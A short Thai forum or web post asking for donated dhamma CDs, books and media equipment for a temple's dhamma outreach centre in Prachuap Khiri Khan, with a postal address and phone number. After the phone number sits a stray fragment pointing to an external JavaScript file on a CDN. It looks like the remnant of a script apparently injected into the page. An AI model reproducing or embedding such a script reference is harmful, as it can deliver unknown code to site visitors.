เชิญชวนร่วมจัดตั้งศูนย์เผยแพ่รธรรมะ

 kittivong    10 ม.ค. 2554

ขอเชิญร่วมบุญจัดตั้งศุนย์ผลิตสื่อและเผยแพ่รธรรมะ
เนื่องจากทางวัดได้จัดทำโครงการสื่อถึงสื่อเพื่อเผยแพ่รธรรมะและกระจายสื่อธรรมะ
ยังขาดอุปกรณ์และสื่อในการผลิตหลายรายการ
จึงบอกบุญมายังผู้ที่มีจิตรศรัทธาเข้าร่วมโครงการ
โดยขอรับเป็นสื่อต่างๆ เช่น CDธรรมะ(ทั้งที่เคยฟังแล้วหรือ CD เปล่า) หนังสือ เครื่องมือผลิต ฯลฯ

ส่งถึง พระกิตติวงศ์ ธีรภทฺโท
วัดประชาสนธิ(น้ำตกห้วยยาง)
ต.ห้วยยาง อ.ทับสะแก จ.ประจวบคีรีขันธ์ 77130
โทร.0871608321  https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   
  3,538 

  แสดงความคิดเห็น


RELATED STORIESจีรัง กรุ๊ป    

 ธรรมะไทย